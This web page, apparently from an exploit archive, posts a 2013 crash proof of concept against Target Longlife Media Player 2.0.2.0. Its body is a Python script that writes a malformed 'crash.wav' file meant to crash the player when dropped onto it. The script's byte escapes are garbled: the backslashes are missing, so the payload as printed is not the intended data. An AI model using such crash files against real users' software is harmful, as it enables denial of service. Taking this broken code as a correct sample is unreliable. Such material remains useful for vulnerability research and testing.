Home / exploits Target Longlife Media Player 2.0.2.0 Crash Proof Of Concept
Posted on 12 September 2013
# Exploit Title : Target Longlife Media Player Version 2.0.2.0 - (.wav) - Crash POC # Date : 11-09-2013 # Exploit Author : gunslinger_ <yuda at cr0security.com> - http://www.cr0security.com # Software Link : http://download.cnet.com/Target-Longlife-Media-Player/3000-2139_4-10417975.html # Version : 2.0.2.0 (Probably old version of software and the LATEST version too) # Vendor Homepage : - # Tested on : Windows XP sp3 #============================================================================================ # After creating POC file (.wav), and simply drag and drop it to Player. #============================================================================================ #!/usr/bin/python string=("x2Ex73x6Ex64x00x00x01x18x00x00x42xDCx00x00x00x01" "x00x00x1Fx40x00x00x00x00x69x61x70x65x74x75x73x2E" "x61x75x00x20x22x69x61x70x65x74x75x73x2Ex61x75x22") filename = "crash.wav" file = open(filename , "w") file.write(string) file.close()
